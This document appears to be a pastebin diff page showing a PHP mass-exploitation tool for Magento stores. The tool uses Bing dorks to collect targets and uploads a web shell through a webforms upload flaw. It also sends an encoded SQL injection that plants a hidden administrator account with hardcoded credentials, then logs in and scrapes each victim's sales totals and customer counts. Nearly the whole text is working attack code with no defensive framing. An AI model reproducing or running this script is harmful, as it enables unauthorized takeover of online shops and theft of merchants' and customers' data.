View difference between Paste ID: <a href="/qxRdePMa">qxRdePMa</a> and <a href="/aGh7w1Ub">aGh7w1Ub</a>

<?php
1		<?php
2		error_reporting(0);
3		set_time_limit(0);
4
5		class indoxploit_mage_exploit {
6		private $jsvulnpath = "/js/webforms/upload/";
7		private $postjs = "files[]";
8
9		public function cover() {
10		print "[ ========================================== ]\n";
11		print "-----> Magento Xploit with Bing Grabber <-----\n";
12		print "All in One Package: [webforms,add admin] Xploit\n";
13		print "Coded by: l0c4lh34rtz ( Mr. Error 404 )\n";
14		print "Greetz: IndoXploit - Sanjungan Jiwa\n";
15		print "[ ========================================== ]\n\n";
16		}
17		public function ngcurl($url,$post=null) {
18		$ch = curl_init($url);
19		if($post != null) {
20		curl_setopt($ch, CURLOPT_POST, true);
21		curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
22		}
23		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
24		curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
25		curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
26		curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
27		curl_setopt($ch, CURLOPT_COOKIESESSION, true);
28		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
29		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
30		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
31		return curl_exec($ch);
32		curl_close($ch);
33		}
34		public function xploit($url, $post) {
35		$ch = curl_init();
36		curl_setopt($ch, CURLOPT_URL, $url);
37		curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
38		curl_setopt($ch, CURLOPT_TIMEOUT, 60);
39		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
40		curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
41		curl_setopt($ch, CURLOPT_POST, 1);
42		$headers = array();
43		$headers[] = 'Accept-Encoding: gzip, deflate';
44		$headers[] = 'Content-Type: application/x-www-form-urlencoded';
45		curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
46		curl_setopt($ch, CURLOPT_HEADER, 1);
47		return curl_exec($ch);
48		curl_close($ch);
49		}
50		public function ambilKata($param, $kata1, $kata2){
51		if(strpos($param, $kata1) === FALSE) return FALSE;
52		if(strpos($param, $kata2) === FALSE) return FALSE;
53		$start = strpos($param, $kata1) + strlen($kata1);
54		$end = strpos($param, $kata2, $start);
55		$return = substr($param, $start, $end - $start);
56		return $return;
57		}
58		}
59
60		$idx = new indoxploit_mage_exploit();
61		$shell = "id.php";
62		$dork = str_replace("'", "", $argv[1]);
63		$dork = urlencode($dork);
64		if(isset($dork)) {
65		$idx->cover();
66		$npage = 1;
67		$npages = 30000;
68		$allLinks = array();
69		$lll = array();
70		while($npage <= $npages) {
71		$x = $idx->ngcurl("http://www.bing.com/search?q=".$dork."&first=".$npage."", null);
72		if($x) {
73		preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
74		foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
75		$npage = $npage + 10;
76		if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
77		} else break;
78		}
79		$URLs = array();
80		foreach($allLinks as $url){
81		$exp = explode("/", $url);
82		$URLs[] = $exp[2];
83		}
84		$array = array_filter($URLs);
85		$array = array_unique($array);
86		$sss = count(array_unique($array));
87		print "Load ($sss) sites\n";
88		print "<------------------------>\n\n";
89		foreach($array as $domain) {
90		if($_SESSION[$domain]) {
91		//
92		} else {
93		$_SESSION[$domain] = "1";
94		// set var all site + path to x
95		$domain = "http://$domain"; // URL TARGET
96		$domain_exploit = $domain."/index.php/"; // URL to Exploit
97		$domain_exploit_add_admin = $domain_exploit."/admin/Cms_Wysiwyg/directive/index/";
98		$domain_downloader = $domain."/downloader/"; // URL to Downloader
99		$domain_admin = $domain_exploit."/admin/"; // URL to Admin Page
100		$domain_js = $domain."/js/webforms/upload/";
101		// end set varr all site + path to x
102		print "[+] URL: $domain ";
103		// set var all curl page
104		$cek_web = $idx->ngcurl($domain_exploit, null); // CURL to Index of site
105		$cek_downloader = $idx->ngcurl($domain_downloader, null); // CURL to Downloader Site
106		$cek_admin = $idx->ngcurl($domain_admin, null); // CURL to Admin Page
107		$cek_webforms = $idx->ngcurl($domain_js, null);
108		// end var all curl page
109
110		// set all exploit webforms
111		$post_js = array("files[]" => "@$shell");
112		$exploit_js = $idx->ngcurl($domain_js, $post_js);
113		preg_match('/"url":"(.*?)"/', $exploit_js, $sh);
114		// end set all exploit webforms
115
116		// set all exploit add admin
117		$postdata = 'filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdJbmRvWHBsb2l0JykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7U0VMRUNUIEBFWFRSQSA6PSBNQVgoZXh0cmEpIEZST00gYWRtaW5fdXNlciBXSEVSRSBleHRyYSBJUyBOT1QgTlVMTDtJTlNFUlQgSU5UTyBgYWRtaW5fdXNlcmAgKGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgLGBycF90b2tlbmAsYHJwX3Rva2VuX2NyZWF0ZWRfYXRgKSBWQUxVRVMgKCdpbmRvJywneHBsb2l0JywnbmdhbnVAbmdhbnUuY29tJywnaW5kb3hwbG9pdCcsQFBBU1MsTk9XKCksMCwwLDEsQEVYVFJBLE5VTEwsIE5PVygpKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKHBhcmVudF9pZCx0cmVlX2xldmVsLHNvcnRfb3JkZXIscm9sZV90eXBlLHVzZXJfaWQscm9sZV9uYW1lKSBWQUxVRVMgKDEsMiwwLCdVJywoU0VMRUNUIHVzZXJfaWQgRlJPTSBhZG1pbl91c2VyIFdIRVJFIHVzZXJuYW1lID0gJ2luZG94cGxvaXQnKSwnRmlyc3RuYW1lJyk7%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1';
118		$result = $idx->xploit($domain_exploit_add_admin, $postdata);
119		$ambil = htmlspecialchars(@file_get_contents($domain_admin));
120		preg_match("/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\">/", $ambil, $key);
121		$post_login = array(
122		"form_key" => $key[1],
123		"login[username]" => "indoxploit",
124		"dummy" => "",
125		"login[password]" => "IndoXploit",
126		);
127		$login_web = $idx->ngcurl($domain_admin, $post_login);
128		preg_match_all('#<span class="price">(.*?)</span>#', $login_web, $matches);
129		$links = array_unique($matches[1]);
130		preg_match_all('/<span class=\"nowrap\" style=\"font-size:18px; color:#EA7601;\">(.*?)<span/', $login_web, $quality);
131		$qual = array_unique($quality[1]);
132		$key2 = $idx->ambilKata($login_web,"/filesystem/adminhtml_filesystem/index/key/","/");
133		$curl_filesystem = $idx->ngcurl($domain_exploit."/filesystem/adminhtml_filesystem/index/key/$key2/", null);
134		$post_downloader = array(
135		"username" => "indoxploit",
136		"password" => "IndoXploit",
137		);
138		$curl_downloader = $idx->ngcurl($domain_downloader, $post_downloader);
139		preg_match_all("/<td class=\"first\">(.*?)<\/td>/", $curl_downloader, $pack);
140		$key3 = $idx->ambilKata($login_web,"/customer/index/key/","/");
141		$curl_customer = $idx->ngcurl($domain_exploit."/admin/customer/index/key/$key3/", null);
142		preg_match_all("/<span id=\"customerGrid-total-count\" class=\"no-display\">(.*?)<\/span>/", $curl_customer, $cust);
143		// end set all exploit add admin
144
145		if(preg_match("/Mage.Cookies.domain/", $cek_web) OR preg_match("/magento/", $cek_downloader) OR preg_match("/magento/", $cek_admin)) {
146		print "[Magento]\n";
147		print "[ ==================================================== ]\n";
148		print "[+] Trying to exploit [Webforms]: ";
149		if(preg_match("[]", $cek_webforms) AND !preg_match("/404\|Not Found\|Error\|Forbidden\|403/i", $cek_webforms)) {
150		print "Vuln \| ";
151		if(preg_match("/{$shell}\|webforms/", $exploit_js)) {
152		print "Xploited!\n";
153		print "[+] Shell: ".str_replace("\\", "", $sh[1])."\n";
154		} else {
155		print "Not Xploited.\n";
156		}
157		} else {
158		print "Not Vuln\n";
159		}
160		print "[+] Trying to exploit [add admin]: ";
161		if(preg_match('#200 OK#', $result)) {
162		print "Xploited! \| ";
163		if(preg_match('/Log Out\|indoxploit/', $login_web)) {
164		print "[Login: OK]\n";
165		print "[ ====================[ $$$$$$$$ ]==================== ]\n";
166		print "[+] Lifetime Sales: ".$links[0]."\n";
167		print "[+] Average Orders: ".$links[1]."\n";
168		print "[+] Quantity Orders: ".$qual[3][0]."\n";
169		print "[+] Total Customers: ".$cust[1][0]." Customers\n";
170		print "[ ====================[ $$$$$$$$ ]==================== ]\n";
171		print "[ ====================[ /\/\/\/\ ]==================== ]\n";
172		print "[+] Filesystem: ";
173		if(preg_match("/File System/", $curl_filesystem)) {
174		print "Found!\n";
175		} else {
176		print "Not Found.\n";
177		}
178		print "[+] Downloader: ";
179		if(preg_match("/Magento Downloader/", $cek_downloader)) {
180		print "Found! \| ";
181		if(preg_match("/Return to Admin\|Log Out/i", $curl_downloader)) {
182		if(preg_match("/Your Magento folder does not have sufficient write permissions./", $curl_downloader)) {
183		$stat_down = "Not Writeable.";
184		} else {
185		$stat_down = "Writeable";
186		}
187		$in = 0;
188		print "[Login: OK] [$stat_down]\n";
189		//print "[+] Packages installed: \n";
190		foreach($pack[1] as $packages) {
191		$in++;
192		//print "-> $packages\n";
193		}
194		print "[+] Installed packages: (".$in.") Packages\n";
195		} else {
196		print "[Login Downloader Failed]\n";
197		}
198		} else {
199		print "[Not Found]\n";
200		}
201		print "[ ====================[ \/\/\/\/ ]==================== ]\n";
202		print "[ ==================================================== ]\n";
203		print "[+] username: indoxploit\n";
204		print "[+] password: IndoXploit\n";
205		print "[+] Login Admin: $domain_admin\n";
206		print "[ ==================================================== ]\n\n";
207		} else {
208		print "[Login Admin Failed]\n\n";
209		}
210		} else {
211		print "Not Vuln\n\n";
212		}
213		} else {
214		print "[Not Magento]\n\n";
215		}
216		}
217		}
218		} else {
219		print "usage: php ".$argv[0]." 'bing_dork'\n";
220		}